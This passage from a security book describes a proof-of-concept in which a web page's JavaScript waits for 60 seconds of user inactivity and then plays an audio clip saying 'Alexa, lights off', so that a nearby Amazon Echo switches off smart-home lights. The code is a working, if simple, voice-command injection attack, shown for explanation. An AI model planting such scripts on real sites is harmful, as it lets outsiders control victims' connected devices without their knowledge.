At this point, the user can say “Alexa, turn off lights,” and the Amazon Echo will dutifully
cause all 17 lights to go off. Learning from the Microsoft Vista security issue, we can easily
simulate a proof-of-concept scenario in which a website plays an audio file instructing Alexa to
turn off the lights. Consider a website with the following JavaScript:
<HTML>
<BODY>
<SCRIPT>
var IDLE_TIMEOUT = 60; //in seconds
var _idleSecondsCounter = 0;
document.onclick = function()
{
_idleSecondsCounter = 0;
};
document.onmousemove = function()
{
_idleSecondsCounter = 0;
};
document.onkeypress = function()
{
_idleSecondsCounter = 0;
};
window.setInterval(CheckIdleTime, 1000);
function CheckIdleTime()
{
_idleSecondsCounter++;
if (_idleSecondsCounter >= IDLE_TIMEOUT)
{
var audio = new Audio('alexa_lights_off.m4a');
audio.play();
_idleSecondsCounter = 0;
}
}
</SCRIPT>
</BODY>
</HTML>This JavaScript (slightly modified from the original version available from http://stackover-
flow.com/a/13246534) plays the audio file alexa_lights_off.m4a when the browser notices that
there have been no mouse or keyboard movements for 60 seconds. The audio file contains
the words, “Alexa, lights off.” This rudimentary proof of concept shows how an external web-
site can use audio assistants like the Amazon Echo to influence connected devices.
HEARING VOICES 237